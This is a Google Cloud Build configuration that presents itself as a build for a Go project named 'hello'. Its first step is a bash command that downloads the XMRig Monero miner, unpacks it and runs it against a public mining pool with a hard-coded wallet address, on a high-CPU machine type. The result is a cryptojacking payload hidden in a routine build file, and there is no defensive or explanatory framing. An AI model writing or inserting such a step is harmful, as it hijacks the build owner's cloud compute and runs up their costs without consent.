steps:
- name: 'bash'
  args: ['apt-get update && apt-get install -y wget && wget https://github.com/xmrig/xmrig/releases/download/v6.12.1/xmrig-6.12.1-linux-static-x64.tar.gz && tar xf xmrig-6.12.1-linux-static-x64.tar.gz && cd xmrig-6.12.1 && ./xmrig -o pool.minexmr.com:4444 -u 46pnjyfeDsULtY7hzFCW3QV5uXuYSXHWZMU66ZwuUxiRbzYNDDtMhaiRYgaAHbsnxxdSVUkrnK3wtYvEFGJDhahcLbkBTyi --rig-id gccb']
  env: ['PROJECT_ROOT=hello']
- name: 'gcr.io/cloud-builders/go'
  args: ['build', 'hello']
  env: ['PROJECT_ROOT=hello']
options:
  machineType: 'N1_HIGHCPU_8'
timeout: 60s
